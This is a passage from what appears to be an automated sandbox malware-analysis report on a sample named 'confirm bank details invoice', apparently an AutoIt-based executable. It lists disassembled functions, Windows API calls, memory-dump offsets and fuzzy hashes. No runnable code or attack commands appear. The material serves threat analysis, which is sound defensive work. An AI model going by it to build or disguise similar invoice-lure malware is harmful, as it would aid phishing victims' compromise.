                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                    • String ID:
                    • API String ID: 395352322-0
                    • Opcode ID: a5e25093b3bbab4af714883b60fb087d1fec2d1b93373ab40a3e7884aa17ab29
                    • Instruction ID: 3078786b79f25a8d6821c7b516506cef38cc1fc198cc8c5c9e9ef3c54208334e
                    • Opcode Fuzzy Hash: a5e25093b3bbab4af714883b60fb087d1fec2d1b93373ab40a3e7884aa17ab29
                    • Instruction Fuzzy Hash: 833119B1D01109BFDB149F90DC99AFFB7BDEB08305F00016BE512A2290DA749F49DAA9
                    Function 004D8FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004D8FE7
                    • GetWindowLongW.USER32(0111E148,000000F0), ref: 004D901A
                    • GetWindowLongW.USER32(0111E148,000000F0), ref: 004D904F
                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 004D9081
                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004D90AB
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 004D90BC
                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004D90D6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: LongWindow$MessageSend
                    • String ID:
                    • API String ID: 2178440468-0
                    • Opcode ID: 9b87661aced4a9db53b5c809df4fd87140d924fdcb777aed51032104e4cc75d4
                    • Instruction ID: 94491a98af9a977e701839a6bee041ea4db9f259538b4f53e6c346a260e6cf85
                    • Opcode Fuzzy Hash: 9b87661aced4a9db53b5c809df4fd87140d924fdcb777aed51032104e4cc75d4
                    • Instruction Fuzzy Hash: CE3137346002149FEB228F98EC95F6637A5FB5A314F14016AF519CF3B1CB75AC44DB49
                    Function 004B08AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                    Download Yara Rule
                    APIs
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004B08F2
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004B0918
                    • SysAllocString.OLEAUT32(00000000), ref: 004B091B
                    • SysAllocString.OLEAUT32(?), ref: 004B0939
                    • SysFreeString.OLEAUT32(?), ref: 004B0942
                    • StringFromGUID2.OLE32(?,?,00000028), ref: 004B0967
                    • SysAllocString.OLEAUT32(?), ref: 004B0975
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                    • String ID:
                    • API String ID: 3761583154-0
                    • Opcode ID: e131d7b1607613ca233360879060e0f30a2c8182be77cf2ad607def2262c9d8d
                    • Instruction ID: d5681f63cd2a4a599b60150484e37c362367127f0d64bf42dbea4428c7aeea02
                    • Opcode Fuzzy Hash: e131d7b1607613ca233360879060e0f30a2c8182be77cf2ad607def2262c9d8d
                    • Instruction Fuzzy Hash: 1521B572A01208AFAB10EF68CC88DFF73ACEB08361B008126F915DB251D774ED45CB68
                    Function 004B2472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                    • API String ID: 1038674560-2734436370
                    • Opcode ID: ce44a658889e426ff9147fdddc765fbbf439a4eaa406256143e4f87038aa8309
                    • Instruction ID: 5ce1c7a6a48c2e968f983423cc3d971ea42c569d78d46841d7db51c5bbccfeef
                    • Opcode Fuzzy Hash: ce44a658889e426ff9147fdddc765fbbf439a4eaa406256143e4f87038aa8309
                    • Instruction Fuzzy Hash: 582148321001217AC630FA259E02EEB7798EF64308F50442BF446A7182E6AD994283BD
                    Function 004B0986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                    Download Yara Rule
                    APIs
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004B09CB
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004B09F1
                    • SysAllocString.OLEAUT32(00000000), ref: 004B09F4
                    • SysAllocString.OLEAUT32 ref: 004B0A15
                    • SysFreeString.OLEAUT32 ref: 004B0A1E
                    • StringFromGUID2.OLE32(?,?,00000028), ref: 004B0A38
                    • SysAllocString.OLEAUT32(?), ref: 004B0A46
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                    • String ID:
                    • API String ID: 3761583154-0
                    • Opcode ID: cf427d46acce82bfeea5bbfbc34604ffe3158f09ed0cfc05e94e394250a935ec
                    • Instruction ID: 06237cafaf685c66671a74c756ac8e26d33378f6527ba3f81b33b2f37cd2ae0e
                    • Opcode Fuzzy Hash: cf427d46acce82bfeea5bbfbc34604ffe3158f09ed0cfc05e94e394250a935ec
                    • Instruction Fuzzy Hash: 84215E75600204AF9B10EFA8DC89DBF77ACEF1C3617008526F909CB2A1E674ED45CB68
                    Function 004DA2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0048D1BA
                      • Part of subcall function 0048D17C: GetStockObject.GDI32(00000011), ref: 0048D1CE
                      • Part of subcall function 0048D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0048D1D8
                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 004DA32D
                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 004DA33A
                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 004DA345
                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 004DA354
                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 004DA360
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend$CreateObjectStockWindow
                    • String ID: Msctls_Progress32
                    • API String ID: 1025951953-3636473452
                    • Opcode ID: d1a2f515e1091b882926435fbd4f841fde011eac9789b00658304eb8e96d4a33
                    • Instruction ID: 68e3a2928a25e89e7177968680e10ef01520e8a5147febc9c2c7ca914be8fac9
                    • Opcode Fuzzy Hash: d1a2f515e1091b882926435fbd4f841fde011eac9789b00658304eb8e96d4a33
                    • Instruction Fuzzy Hash: 4111E6B1100219BEEF105FA1CC85EEB7F6DFF08798F014116FA04A61A0C7769C21DBA8
                    Function 0048CCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                    Download Yara Rule
                    APIs
                    • GetClientRect.USER32(?,?), ref: 0048CCF6
                    • GetWindowRect.USER32(?,?), ref: 0048CD37
                    • ScreenToClient.USER32(?,?), ref: 0048CD5F
                    • GetClientRect.USER32(?,?), ref: 0048CE8C
                    • GetWindowRect.USER32(?,?), ref: 0048CEA5
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Rect$Client$Window$Screen
                    • String ID:
                    • API String ID: 1296646539-0
                    • Opcode ID: cb4efdc38e4bf738d3cb1d8b869ca226f17ab54e844e5f7c6216463f80016aee
                    • Instruction ID: 6041da601ed8675f7d8993edc2e03acb4f123912201a6788b347806954c4a2f3
                    • Opcode Fuzzy Hash: cb4efdc38e4bf738d3cb1d8b869ca226f17ab54e844e5f7c6216463f80016aee
                    • Instruction Fuzzy Hash: 9EB15A79900249DBDF10DFA9C4807EEBBB1FF08300F14952AEC59EB250DB38A951CB69
                    Function 004D1BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                    Download Yara Rule
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32 ref: 004D1C18
                    • Process32FirstW.KERNEL32(00000000,?), ref: 004D1C26
                    • __wsplitpath.LIBCMT ref: 004D1C54
                      • Part of subcall function 00491DFC: __wsplitpath_helper.LIBCMT ref: 00491E3C
                    • _wcscat.LIBCMT ref: 004D1C69
                    • Process32NextW.KERNEL32(00000000,?), ref: 004D1CDF
                    • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 004D1CF1
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                    • String ID:
                    • API String ID: 1380811348-0
                    • Opcode ID: 9708fab33ae2a893ad86701c0eb1d2cac5c4babf022d0d5fc4e85bc4f88252a8
                    • Instruction ID: 99b04954f240e6859f25edec50b3cba63508f79284c91008c21af9326f864e7e
                    • Opcode Fuzzy Hash: 9708fab33ae2a893ad86701c0eb1d2cac5c4babf022d0d5fc4e85bc4f88252a8
                    • Instruction Fuzzy Hash: E7515E71504300AFD720EF25D885EABB7ECEF88758F00492FF98997251EB74A905CB96
                    Function 004D2FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004D3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004D2BB5,?,?), ref: 004D3C1D
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004D30AF
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004D30EF
                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 004D3112
                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 004D313B
                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 004D317E
                    • RegCloseKey.ADVAPI32(00000000), ref: 004D318B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                    • String ID:
                    • API String ID: 3451389628-0
                    • Opcode ID: 4c0692b8c13c3979e90d8d8d9fbec96125f13e46772f12d6cb34e73d57af1e45
                    • Instruction ID: 7a3dcb9b0f9eb0b23d3922af4462da936cd37b0baf435f04403037231e413e62
                    • Opcode Fuzzy Hash: 4c0692b8c13c3979e90d8d8d9fbec96125f13e46772f12d6cb34e73d57af1e45
                    • Instruction Fuzzy Hash: 93515A31504200AFC704EF65C895EAEBBF9FF89308F04891EF59587291DB75EA05CB5A
                    Function 004D84DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetMenu.USER32(?), ref: 004D8540
                    • GetMenuItemCount.USER32(00000000), ref: 004D8577
                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004D859F
                    • GetMenuItemID.USER32(?,?), ref: 004D860E
                    • GetSubMenu.USER32(?,?), ref: 004D861C
                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 004D866D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Menu$Item$CountMessagePostString
                    • String ID:
                    • API String ID: 650687236-0
                    • Opcode ID: bb6a2f15047d4b63959a05ad587bf4e576ee708db35562a95f991f575f4f88fc
                    • Instruction ID: e065cd0012a3a1be8693ea2198b123623c6053a918502622b5858adb5e169c00
                    • Opcode Fuzzy Hash: bb6a2f15047d4b63959a05ad587bf4e576ee708db35562a95f991f575f4f88fc
                    • Instruction Fuzzy Hash: 52519C31A00115AFCB01EF69C951ABEB7F5EF48314F10446FE905BB351CB78AE418B98
                    Function 004B4AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 004B4B10
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004B4B5B
                    • IsMenu.USER32(00000000), ref: 004B4B7B
                    • CreatePopupMenu.USER32 ref: 004B4BAF
                    • GetMenuItemCount.USER32(000000FF), ref: 004B4C0D
                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 004B4C3E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                    • String ID:
                    • API String ID: 3311875123-0
                    • Opcode ID: 32abc51f147916b080471e6f8e33b55689b60f84fe3237e3b2f4a985e324b0a6
                    • Instruction ID: 2dda9bd1a2116bfc46ce1d90b0ddb85cb5ac1638cadfc96740c69ad0d0e4467e
                    • Opcode Fuzzy Hash: 32abc51f147916b080471e6f8e33b55689b60f84fe3237e3b2f4a985e324b0a6
                    • Instruction Fuzzy Hash: 0C51C070601209EBDF20CF68C888BEEBFF4AF84718F14415AE5159B292D3789945CB7A
                    Function 004C8DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON
                    Download Yara Rule
                    APIs
                    • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0050DC00), ref: 004C8E7C
                    • WSAGetLastError.WSOCK32(00000000), ref: 004C8E89
                    • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 004C8EAD
                    • #16.WSOCK32(?,?,00000000,00000000), ref: 004C8EC5
                    • _strlen.LIBCMT ref: 004C8EF7
                    • WSAGetLastError.WSOCK32(00000000), ref: 004C8F6A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ErrorLast$_strlenselect
                    • String ID:
                    • API String ID: 2217125717-0
                    • Opcode ID: e78b672a557c1e743b40b6822eee63cf659f101294dc91f81ddbbf3aefc86baa
                    • Instruction ID: e01e942b5a8fe495ee96f84d4b8569cf48d25e507879bc56fc6cb539015d5cbf
                    • Opcode Fuzzy Hash: e78b672a557c1e743b40b6822eee63cf659f101294dc91f81ddbbf3aefc86baa
                    • Instruction Fuzzy Hash: 3541B275900104ABCB54EBA5CD85FEEB7BAAF48314F10456EF51A97291DF38AE00CB68
                    Function 0048ABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048B34E: GetWindowLongW.USER32(?,000000EB), ref: 0048B35F
                    • BeginPaint.USER32(?,?,?), ref: 0048AC2A
                    • GetWindowRect.USER32(?,?), ref: 0048AC8E
                    • ScreenToClient.USER32(?,?), ref: 0048ACAB
                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0048ACBC
                    • EndPaint.USER32(?,?,?,?,?), ref: 0048AD06
                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004EE673
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                    • String ID:
                    • API String ID: 2592858361-0
                    • Opcode ID: 9ec591f91ca323b8fcb5c44ab80fcfe18e75c478da0a84d846b952254f45babd
                    • Instruction ID: 892e9b4c7ff00dad811759a8a9d03aac778099fc842537f523df75622a3fd8c3
                    • Opcode Fuzzy Hash: 9ec591f91ca323b8fcb5c44ab80fcfe18e75c478da0a84d846b952254f45babd
                    • Instruction Fuzzy Hash: 5B41E3705006009FD710EF65CC85F7B7BE8FB69325F040A2AF9A4872A1C7749855DB6A
                    Function 004DE397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                    Download Yara Rule
                    APIs
                    • ShowWindow.USER32(00531628,00000000,00531628,00000000,00000000,00531628,?,004EDC5D,00000000,?,00000000,00000000,00000000,?,004EDAD1,00000004), ref: 004DE40B
                    • EnableWindow.USER32(00000000,00000000), ref: 004DE42F
                    • ShowWindow.USER32(00531628,00000000), ref: 004DE48F
                    • ShowWindow.USER32(00000000,00000004), ref: 004DE4A1
                    • EnableWindow.USER32(00000000,00000001), ref: 004DE4C5
                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 004DE4E8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Window$Show$Enable$MessageSend
                    • String ID:
                    • API String ID: 642888154-0
                    • Opcode ID: 49053f94687b9367a077acde2fd64dad7310ae9c0f22a7ccc23257d797476884
                    • Instruction ID: e5b4d0078102b703882cb6d2d38c1523ad95101d3f4fa2d11d6fcf8b8cee3d9d
                    • Opcode Fuzzy Hash: 49053f94687b9367a077acde2fd64dad7310ae9c0f22a7ccc23257d797476884
                    • Instruction Fuzzy Hash: 92416330601140EFDB21DF26C4A9B957BE1BF05304F1881BBEA588F3A2C775E851CB55
                    Function 004B98BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON
                    Download Yara Rule
                    APIs
                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 004B98D1
                      • Part of subcall function 0048F4EA: std::exception::exception.LIBCMT ref: 0048F51E
                      • Part of subcall function 0048F4EA: __CxxThrowException@8.LIBCMT ref: 0048F533
                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 004B9908
                    • EnterCriticalSection.KERNEL32(?), ref: 004B9924
                    • LeaveCriticalSection.KERNEL32(?), ref: 004B999E
                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004B99B3
                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 004B99D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                    • String ID:
                    • API String ID: 2537439066-0
                    • Opcode ID: 6efb28634c6df20d3c3a80d6ae09c327e65c608fa497b4ba405b1e48f1938792
                    • Instruction ID: 880d3fde50eeeed4d9c80c6643c33ff70f25009f4e6a8ddccb73ab15677d9162
                    • Opcode Fuzzy Hash: 6efb28634c6df20d3c3a80d6ae09c327e65c608fa497b4ba405b1e48f1938792
                    • Instruction Fuzzy Hash: 4431CF71900105EBDB10AFA5CD85EAFBB78FF45310B1480BAF904AB246D774DE14DBA8
                    Function 004C9B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                    Download Yara Rule
                    APIs
                    • GetForegroundWindow.USER32(?,?,?,?,?,?,004C77F4,?,?,00000000,00000001), ref: 004C9B53
                      • Part of subcall function 004C6544: GetWindowRect.USER32(?,?), ref: 004C6557
                    • GetDesktopWindow.USER32 ref: 004C9B7D
                    • GetWindowRect.USER32(00000000), ref: 004C9B84
                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 004C9BB6
                      • Part of subcall function 004B7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 004B7AD0
                    • GetCursorPos.USER32(?), ref: 004C9BE2
                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 004C9C44
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
